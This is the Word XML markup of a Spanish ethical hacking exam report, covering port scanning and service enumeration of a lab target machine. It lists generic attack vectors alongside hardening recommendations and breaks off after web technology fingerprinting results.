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E8A25" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Informe Técnico: Examen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ethical</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hacking - Máquina Virtual Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30368DCD" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Este informe técnico documenta de forma completa la auditoría de penetración realizada sobre la máquina virtual objetivo en el examen de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Ethical</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> Hacking. Se respeta íntegramente todo el contenido proporcionado, sin omitir ningún detalle, comando, resultado o análisis. Se corrigen únicamente las faltas de ortografía para profesionalidad en tu portfolio Red </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Team</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>. Se dejan </w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>espacios específicos para capturas de pantalla</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:t> en puntos clave.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EABB94" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:pict w14:anchorId="70FD39C1">
          <v:rect id="_x0000_i1025" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="432AE8E5" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fase de Escaneo y Enumeración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603561A5" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Con el objetivo de identificar servicios activos y posibles vectores de ataque se realizó un escaneo de puertos sobre la máquina objetivo utilizando herramientas de reconocimiento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEFE994" w14:textId="3847EE50" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E0CF85" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📡</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resultados del escaneo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B860BCB" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t>Se detectaron los siguientes puertos abiertos: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2017"/>
        <w:gridCol w:w="7013"/>
      </w:tblGrid>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="093E3646" w14:textId="77777777" w:rsidTr="00301B4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07F227E" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Puerto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85B1B02" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Servicio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27F066" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="22AEBFB3" w14:textId="77777777" w:rsidTr="00301B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B4DE44" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F"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BFB171" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>HTTP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07149D" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Servidor web (Apache/PHP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="062C37AD" w14:textId="77777777" w:rsidTr="00301B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FD08C0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>135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45759C" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>RPC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BD9C90" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Llamadas a procedimientos remotos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="20132121" w14:textId="77777777" w:rsidTr="00301B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60A8F5" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>139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3EB94A" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>NetBIOS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571024" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Servicio de compartición en red</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="2070784C" w14:textId="77777777" w:rsidTr="00301B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EA9F9F" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>445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FA45D0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>SMB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553F76" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Recursos compartidos de Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="7A1F6675" w14:textId="77777777" w:rsidTr="00301B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C3BAB4" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>5985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DE3C9F" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t>WinRM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C86033" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Administración remota de Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21AA7FDB" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Análisis de los servicios detectados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F7B706" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Puerto 80 (HTTP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>El puerto 80 se encuentra abierto y accesible, alojando un servidor web basado en Apache con soporte PHP.</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Durante la enumeración se identificó un sitio web basado en WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E351913" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Posibles vectores de ataque:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660FDB12" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:lastRenderedPageBreak/>
        <w:t>Enumeración de usuarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09543455" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Ataques de fuerza bruta sobre el panel de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E685ED7" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Explotación de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>plugins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> o servicios vulnerables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050B66A1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Puertos 135, 139, 445 (RPC/NetBIOS/SMB)</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Estos puertos corresponden a servicios de red interna de Windows utilizados para la compartición de archivos y administración remota.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216CE02B" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Posibles vectores de ataque:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E09581" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Enumeración de recursos compartidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD4656F" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Acceso a archivos internos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11441890" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Autenticación mediante credenciales válidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6EF97E" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Ejecución remota de comandos (en caso de privilegios suficientes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486644EB" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Puerto 5985 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t xml:space="preserve">El servicio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> permite la administración remota del sistema mediante HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166EC5D0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Posibles vectores de ataque:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A77941" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Acceso remoto al sistema con credenciales válidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE39165" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Ejecución de comandos de forma remota</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4DC746" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Control del sistema sin necesidad de explotación adicional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E2C4BD" w14:textId="3FB65C86" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="009C40CA" w:rsidP="00301B4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="520859D8" wp14:editId="37A5E3F1">
            <wp:extent cx="5400040" cy="26860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4752" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusión de la fase de escaneo</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>El sistema presenta múltiples servicios expuestos que incrementan la superficie de ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32970BA0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t>En particular:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A5D642" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:lastRenderedPageBreak/>
        <w:t>El servicio web (puerto 80) permite la obtención de información y posibles credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601999B6" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Los servicios SMB (puerto 445) y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> (puerto 5985) pueden ser utilizados para acceso remoto en caso de compromiso de credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512ABEFF" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recomendaciones generales para Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEE1B58" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Restringir el acceso al puerto 80 solo a redes internas o una zona bastionada; bloquear el acceso desde redes externas a ese servidor web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9BEF97" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Limitar el acceso a los puertos 135, 139 y 445 solo a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>PCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> internos de confianza y desactivar el SMBv1 si está activo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254327A2" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Revisar y endurecer la administración de credenciales en la web y si se usa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> configurarlo por HTTPS (puerto 5986) y no dejarlo expuesto a redes abiertas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C543909" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:pict w14:anchorId="3D9D9747">
          <v:rect id="_x0000_i1026" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="661CD72C" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Servidor web accesible por el puerto 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B77A911" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumeración del servicio web (Puerto 80)</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>La máquina objetivo presenta un servicio web activo en el puerto 80 accesible desde la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC8D666" w14:textId="4E6195B9" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t>Al acceder mediante navegador se observa una página web funcional sin mecanismos visibles de protección frente a enumeración o ataques automatizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D5D008" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis de la web con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WhatWeb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="039ABFF7" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Se utilizó la herramienta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>WhatWeb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> para identificar las tecnologías empleadas por el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C32059" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Se detectó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BCEA51" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Servidor web: Apache 2.4.41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54762C85" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Sistema operativo: Windows (64 bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496D756" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Lenguaje: PHP 7.3.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4236BFC3" w14:textId="4EAFF25A" w:rsidR="009C40CA" w:rsidRDefault="009C40CA" w:rsidP="009C40CA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="009C40CA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EF156F0" wp14:editId="1BA112C7">
            <wp:extent cx="5019675" cy="26574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14E2" w14:textId="5D8FDDE5" w:rsidR="009C40CA" w:rsidRPr="00301B4F" w:rsidRDefault="009C40CA" w:rsidP="009C40CA">
